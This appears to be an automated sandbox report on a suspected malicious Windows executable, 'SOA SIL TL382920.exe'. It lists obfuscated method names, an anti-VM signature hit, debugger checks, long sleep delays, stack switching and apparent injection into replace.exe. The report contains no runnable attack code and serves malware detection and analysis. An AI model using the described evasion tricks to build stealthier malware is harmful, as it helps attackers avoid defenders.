Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, NFyHMq8GrX09kSU6fc.cs	High entropy of concatenated method names: 'Q0GBrfIG5V', 'PF1BdoimVi', 'sOsBCrcdwO', 'rbnBXFSt36', 'LmgBnUWekc', 'Jn2BGNoHg4', 'nS3BUj4Mh6', 'BvWBs5iU4s', 'prABoNG7CG', 'fYGBQpfgWy'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, vEMm9TGqkTbSK2DWuX.cs	High entropy of concatenated method names: 'YFbVTqlxw5', 'XH2VxmgvQ0', 'KLdVpTbIFy', 'aHFVB1ZQhc', 'Dw2VH0o0LK', 'WIGp4FhaM4', 'fRCpt5Yru2', 'jaHpSWJQyN', 'bk4pywvOQs', 'eyOpmiRGW6'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, oh8d8J2Z3QMfQxImdTr.cs	High entropy of concatenated method names: 'MpBlrGwNZx', 'IaQld2S42U', 'FAflCyqVj8', 'tQ5lXeyOfw', 'SPWlnVsnjV', 'EIklGHpuQL', 'EkOlUbIxqs', 'rLalsohUp0', 'GBOlokBHRT', 'lkclQLLVpq'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	High entropy of concatenated method names: 'BPTMTPIyDS', 'I4EMRDtROT', 'Y1jMxcebvW', 'CDfMkrBg5s', 'jeiMpbjB07', 'tBfMVOiuBo', 'hUBMBkaGlI', 'FIFMHfWMcG', 'WovMO9MXXe', 'C9KMADpC5X'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, pUEAtE22XMsD0aDaH3F.cs	High entropy of concatenated method names: 'ToString', 'wXb8MlXaJc', 'YsM8jMPuhv', 'nkW8Tu7IHX', 'CXI8RAMmJA', 'kbI8x4mdaq', 'FT48kQmeUC', 'aqw8pSh0VJ', 'F1OjSrh8vqC97vocmP2', 'sJQOL4hWAii6jktb04L'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, RreqsmkbHTMnh2NVRx.cs	High entropy of concatenated method names: 'uShNRYJyVS', 'gY0NxTlhVc', 'q7nNkvAXIP', 'FLuNpiaWNo', 'R6iNV7p7hi', 'VNqNBVo4aD', 'UH8NHCC21i', 'VB9NOqKlXZ', 'O0CNAd5yq6', 'dUFNWfGqEr'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, XhCqR5zmlyqt5yQm3v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sh1l1FbA40', 'ctml7wUF5c', 'hZUl5u9INh', 'yWalJBwixd', 'fIplNBMD1U', 'oIpll3LPxI', 'Wfll8gMeAP'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, pHwhV20V03y5CCZ9Ef.cs	High entropy of concatenated method names: 'Dispose', 'ATkumqGXpA', 'LHPhaN5Xub', 'NJkEEfr4fk', 'MLxuKrjC6H', 'WRXuzCLtki', 'ProcessDialogKey', 'MfUhvZDZ4S', 'E42huPaMIN', 'vOphhD7Msw'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, sDyThrA2a2XUGkyEDW.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ixVhmg6399', 'aBjhKrx4HD', 'XPQhzyfcqg', 'i2FMvI8PxX', 'ESkMuwIebq', 'lrcMhLiRpg', 'hlnMM7caw7', 'LuTAQDzUFgjZGBpENS'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	High entropy of concatenated method names: 'zpjx6X8nd7', 'P60xZISpi9', 'e3pxeKlgZF', 'HQbx9Vpw0R', 'FS3x4xbRRf', 'OcQxt5wSFG', 'puDxS6iAOa', 'cYXxyuSYvS', 'Lssxmr2Feu', 'UT9xK8yIoB'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, ywbAm7qFrfxqBfnsZL.cs	High entropy of concatenated method names: 'MDRuBAUq7J', 'm3HuHf6xVS', 'YlWuAlInbP', 'HlouW48W0Q', 'mLqu7S9V1L', 'Tm0u5yJe0m', 'UbxuEmvE1iRDIu68jw', 'Aa4Uv1ua3q1gt7AqiR', 'loTuuD4Ex4', 'NTFuM04Ug8'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, zclspqvkJLhbYittNv.cs	High entropy of concatenated method names: 'qfDpnOuRND', 'O0ypU5RtBj', 'E7akgIiePV', 'q4okLE0UNn', 'cQkk2Cblu8', 't01kbyJMK2', 'tQwkFOQiWs', 'AMSkPRLWHa', 'PwOkftlkyK', 'UYFkI2Qqv3'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, tUPDfr2gf3XDC7vJa48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'De386LYfpw', 'tki8ZdyYlg', 'v6e8e0sy54', 'bnV897kYD5', 'NGV84T567O', 'NNh8tsyg9V', 'xyN8SZOP1d'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, IrkVVDF7qxNbVDw9e9.cs	High entropy of concatenated method names: 'QnFBRTP2ye', 'exVBkflBqw', 'EL3BV7fbYd', 'EwgVKL8w8a', 'NCwVzVygMj', 'XhmBvBW2lF', 'dEHBuihDAT', 'Ah6BhpLfgy', 'PdNBMI1rRV', 'VfCBjP5WMg'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, vOKCEEwom9DPq6wCSb.cs	High entropy of concatenated method names: 'faV1sHl9n2', 'M611okeMC9', 'Hs51wOf0pg', 'zho1aBlftu', 'L701LNo2J9', 'Vfc12dUsdr', 'lGy1FYeHDV', 'zYG1PMjv73', 'wGr1IQu9dN', 'CGB1DkVCEv'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, dMqAJ5HbYJvSvNqENx.cs	High entropy of concatenated method names: 'ToString', 'jp55DfH9OV', 'K9d5aRCWCV', 'Ttv5gjdZR9', 'QyB5L4PcPx', 'WMF52VRTll', 'XRi5bkS8xE', 'q6S5Fp03JV', 'eie5PLx1hX', 'TYM5ftYBE9'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, M1h21NiSLROdxSbxpP.cs	High entropy of concatenated method names: 'xuDkXn2hM7', 'zZxkG3NHHo', 'A5rks6eyI5', 'A8xkor3eSU', 'KaBk7Vbro5', 'nylk5DBr89', 'UqlkJKIGu4', 'T9ikNRaAik', 'HfIklnAtD5', 'El7k8WiMvr'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, tA4VCFI8paMxTv4RoO.cs	High entropy of concatenated method names: 'DvLCQAJuQ', 'YbXXhNsB7', 'REVGfrcfr', 'knwUdRx4p', 'D0HoPiHYc', 'GCGQ8tD9L', 'WUxO5DGlAKAZQxQfWX', 'dJcL2vT518F7a14V8N', 'suw4I5AS6ZrHlFnggD', 'zT1NPlKyt'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, h84iwTVuOfwRagKMD4.cs	High entropy of concatenated method names: 'tXJJyuDc66', 'VRCJKQNwHi', 'H8KNvCJ8Aj', 'Y6NNuwtai4', 'j6TJDQTBRE', 'et6JiwAVGd', 'kuVJ3G1sRb', 'YRKJ6i0YDr', 'Bm7JZ7cBl5', 'zPXJeU29DI'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, eZTw0aMcgXfmLQy1ud.cs	High entropy of concatenated method names: 'g0ONwgeITL', 'alYNara338', 'cBxNgLvc86', 'LdONL1Ij0P', 'I20N6TgGL4', 'rfcN2Y8wuK', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, Xpbm3yB50V80TamYNd.cs	High entropy of concatenated method names: 'x11JAxWwZK', 'iRDJWnsGqZ', 'ToString', 'nCtJRtbTWb', 'cH2JxYyQGs', 'GvMJkrH8CI', 'c8dJpAHihI', 'ob8JVlGuhI', 'kewJBqGbr9', 'p89JH8kHCE'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, CuFkfr7adGBIK2Wadu.cs	High entropy of concatenated method names: 'rKZldDOwRMjM9PjgaXL', 'w06MLUOmqXuqZQ3r1qX', 'dIvVNeueNY', 'cEEVlKWeOx', 'p82V8F3FTp', 'gFcIiBOSYmeyBaEgtmb', 'n7vTbiOVt1YGl9kMREW'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, AnNfyhuSxfOQKhnA04.cs	High entropy of concatenated method names: 'AScluq9xFj', 'ghSlMlbhoZ', 'VQOljRftMm', 'kQZlRFTFpn', 'Bi3lxENYaY', 'obBlpnK25Y', 'A7DlVEEySe', 'TI8NSILC2Q', 'U22Nyt1wBC', 'XhLNmJWtGV'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, NFyHMq8GrX09kSU6fc.cs	High entropy of concatenated method names: 'Q0GBrfIG5V', 'PF1BdoimVi', 'sOsBCrcdwO', 'rbnBXFSt36', 'LmgBnUWekc', 'Jn2BGNoHg4', 'nS3BUj4Mh6', 'BvWBs5iU4s', 'prABoNG7CG', 'fYGBQpfgWy'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, vEMm9TGqkTbSK2DWuX.cs	High entropy of concatenated method names: 'YFbVTqlxw5', 'XH2VxmgvQ0', 'KLdVpTbIFy', 'aHFVB1ZQhc', 'Dw2VH0o0LK', 'WIGp4FhaM4', 'fRCpt5Yru2', 'jaHpSWJQyN', 'bk4pywvOQs', 'eyOpmiRGW6'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, oh8d8J2Z3QMfQxImdTr.cs	High entropy of concatenated method names: 'MpBlrGwNZx', 'IaQld2S42U', 'FAflCyqVj8', 'tQ5lXeyOfw', 'SPWlnVsnjV', 'EIklGHpuQL', 'EkOlUbIxqs', 'rLalsohUp0', 'GBOlokBHRT', 'lkclQLLVpq'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	High entropy of concatenated method names: 'BPTMTPIyDS', 'I4EMRDtROT', 'Y1jMxcebvW', 'CDfMkrBg5s', 'jeiMpbjB07', 'tBfMVOiuBo', 'hUBMBkaGlI', 'FIFMHfWMcG', 'WovMO9MXXe', 'C9KMADpC5X'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, pUEAtE22XMsD0aDaH3F.cs	High entropy of concatenated method names: 'ToString', 'wXb8MlXaJc', 'YsM8jMPuhv', 'nkW8Tu7IHX', 'CXI8RAMmJA', 'kbI8x4mdaq', 'FT48kQmeUC', 'aqw8pSh0VJ', 'F1OjSrh8vqC97vocmP2', 'sJQOL4hWAii6jktb04L'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, RreqsmkbHTMnh2NVRx.cs	High entropy of concatenated method names: 'uShNRYJyVS', 'gY0NxTlhVc', 'q7nNkvAXIP', 'FLuNpiaWNo', 'R6iNV7p7hi', 'VNqNBVo4aD', 'UH8NHCC21i', 'VB9NOqKlXZ', 'O0CNAd5yq6', 'dUFNWfGqEr'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, XhCqR5zmlyqt5yQm3v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sh1l1FbA40', 'ctml7wUF5c', 'hZUl5u9INh', 'yWalJBwixd', 'fIplNBMD1U', 'oIpll3LPxI', 'Wfll8gMeAP'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, pHwhV20V03y5CCZ9Ef.cs	High entropy of concatenated method names: 'Dispose', 'ATkumqGXpA', 'LHPhaN5Xub', 'NJkEEfr4fk', 'MLxuKrjC6H', 'WRXuzCLtki', 'ProcessDialogKey', 'MfUhvZDZ4S', 'E42huPaMIN', 'vOphhD7Msw'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, sDyThrA2a2XUGkyEDW.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ixVhmg6399', 'aBjhKrx4HD', 'XPQhzyfcqg', 'i2FMvI8PxX', 'ESkMuwIebq', 'lrcMhLiRpg', 'hlnMM7caw7', 'LuTAQDzUFgjZGBpENS'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	High entropy of concatenated method names: 'zpjx6X8nd7', 'P60xZISpi9', 'e3pxeKlgZF', 'HQbx9Vpw0R', 'FS3x4xbRRf', 'OcQxt5wSFG', 'puDxS6iAOa', 'cYXxyuSYvS', 'Lssxmr2Feu', 'UT9xK8yIoB'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, ywbAm7qFrfxqBfnsZL.cs	High entropy of concatenated method names: 'MDRuBAUq7J', 'm3HuHf6xVS', 'YlWuAlInbP', 'HlouW48W0Q', 'mLqu7S9V1L', 'Tm0u5yJe0m', 'UbxuEmvE1iRDIu68jw', 'Aa4Uv1ua3q1gt7AqiR', 'loTuuD4Ex4', 'NTFuM04Ug8'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, zclspqvkJLhbYittNv.cs	High entropy of concatenated method names: 'qfDpnOuRND', 'O0ypU5RtBj', 'E7akgIiePV', 'q4okLE0UNn', 'cQkk2Cblu8', 't01kbyJMK2', 'tQwkFOQiWs', 'AMSkPRLWHa', 'PwOkftlkyK', 'UYFkI2Qqv3'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, tUPDfr2gf3XDC7vJa48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'De386LYfpw', 'tki8ZdyYlg', 'v6e8e0sy54', 'bnV897kYD5', 'NGV84T567O', 'NNh8tsyg9V', 'xyN8SZOP1d'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, IrkVVDF7qxNbVDw9e9.cs	High entropy of concatenated method names: 'QnFBRTP2ye', 'exVBkflBqw', 'EL3BV7fbYd', 'EwgVKL8w8a', 'NCwVzVygMj', 'XhmBvBW2lF', 'dEHBuihDAT', 'Ah6BhpLfgy', 'PdNBMI1rRV', 'VfCBjP5WMg'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, vOKCEEwom9DPq6wCSb.cs	High entropy of concatenated method names: 'faV1sHl9n2', 'M611okeMC9', 'Hs51wOf0pg', 'zho1aBlftu', 'L701LNo2J9', 'Vfc12dUsdr', 'lGy1FYeHDV', 'zYG1PMjv73', 'wGr1IQu9dN', 'CGB1DkVCEv'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, dMqAJ5HbYJvSvNqENx.cs	High entropy of concatenated method names: 'ToString', 'jp55DfH9OV', 'K9d5aRCWCV', 'Ttv5gjdZR9', 'QyB5L4PcPx', 'WMF52VRTll', 'XRi5bkS8xE', 'q6S5Fp03JV', 'eie5PLx1hX', 'TYM5ftYBE9'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, M1h21NiSLROdxSbxpP.cs	High entropy of concatenated method names: 'xuDkXn2hM7', 'zZxkG3NHHo', 'A5rks6eyI5', 'A8xkor3eSU', 'KaBk7Vbro5', 'nylk5DBr89', 'UqlkJKIGu4', 'T9ikNRaAik', 'HfIklnAtD5', 'El7k8WiMvr'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, tA4VCFI8paMxTv4RoO.cs	High entropy of concatenated method names: 'DvLCQAJuQ', 'YbXXhNsB7', 'REVGfrcfr', 'knwUdRx4p', 'D0HoPiHYc', 'GCGQ8tD9L', 'WUxO5DGlAKAZQxQfWX', 'dJcL2vT518F7a14V8N', 'suw4I5AS6ZrHlFnggD', 'zT1NPlKyt'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, h84iwTVuOfwRagKMD4.cs	High entropy of concatenated method names: 'tXJJyuDc66', 'VRCJKQNwHi', 'H8KNvCJ8Aj', 'Y6NNuwtai4', 'j6TJDQTBRE', 'et6JiwAVGd', 'kuVJ3G1sRb', 'YRKJ6i0YDr', 'Bm7JZ7cBl5', 'zPXJeU29DI'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, eZTw0aMcgXfmLQy1ud.cs	High entropy of concatenated method names: 'g0ONwgeITL', 'alYNara338', 'cBxNgLvc86', 'LdONL1Ij0P', 'I20N6TgGL4', 'rfcN2Y8wuK', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, Xpbm3yB50V80TamYNd.cs	High entropy of concatenated method names: 'x11JAxWwZK', 'iRDJWnsGqZ', 'ToString', 'nCtJRtbTWb', 'cH2JxYyQGs', 'GvMJkrH8CI', 'c8dJpAHihI', 'ob8JVlGuhI', 'kewJBqGbr9', 'p89JH8kHCE'
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, CuFkfr7adGBIK2Wadu.cs	High entropy of concatenated method names: 'rKZldDOwRMjM9PjgaXL', 'w06MLUOmqXuqZQ3r1qX', 'dIvVNeueNY', 'cEEVlKWeOx', 'p82V8F3FTp', 'gFcIiBOSYmeyBaEgtmb', 'n7vTbiOVt1YGl9kMREW'

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SOA SIL TL382920.exe PID: 7820, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D144
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC17650594
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764FF74
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D6C4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D864
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API/Special instruction interceptor: Address: 7FFC1764D004
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D144
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D604
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D764
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D324
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D364
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D004
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764FF74
Source: C:\Windows\SysWOW64\replace.exe	API/Special instruction interceptor: Address: 7FFC1764D864

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 1570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 5030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 7060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 8060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 81D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Memory allocated: 91D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Code function: 2_2_01871763 rdtsc

2_2_01871763

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\replace.exe

Window / User API: threadDelayed 9852

Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\replace.exe	API coverage: 3.7 %

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe TID: 7876	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep count: 9852 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 7288	Thread sleep time: -19704000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe TID: 7340	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\replace.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\replace.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\replace.exe

Code function: 4_2_028CC240 FindFirstFileW,FindNextFileW,FindClose,

4_2_028CC240

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: MBLUUsWuClSd.exe, 00000005.00000002.23442345473.000000000146F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: replace.exe, 00000004.00000002.23441797412.0000000002BA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.21575564801.0000024AE6CE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Code function: 2_2_01871763 rdtsc

2_2_01871763

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Code function: 2_2_00417473 LdrLoadDll,

2_2_00417473

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01834180 mov eax, dword ptr fs:[00000030h]	2_2_01834180
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01834180 mov eax, dword ptr fs:[00000030h]	2_2_01834180
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01834180 mov eax, dword ptr fs:[00000030h]	2_2_01834180
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01859194 mov eax, dword ptr fs:[00000030h]	2_2_01859194
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871190 mov eax, dword ptr fs:[00000030h]	2_2_01871190
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871190 mov eax, dword ptr fs:[00000030h]	2_2_01871190
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_019051B6 mov eax, dword ptr fs:[00000030h]	2_2_019051B6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018631BE mov eax, dword ptr fs:[00000030h]	2_2_018631BE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018631BE mov eax, dword ptr fs:[00000030h]	2_2_018631BE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018641BB mov ecx, dword ptr fs:[00000030h]	2_2_018641BB
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018641BB mov eax, dword ptr fs:[00000030h]	2_2_018641BB
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018641BB mov eax, dword ptr fs:[00000030h]	2_2_018641BB
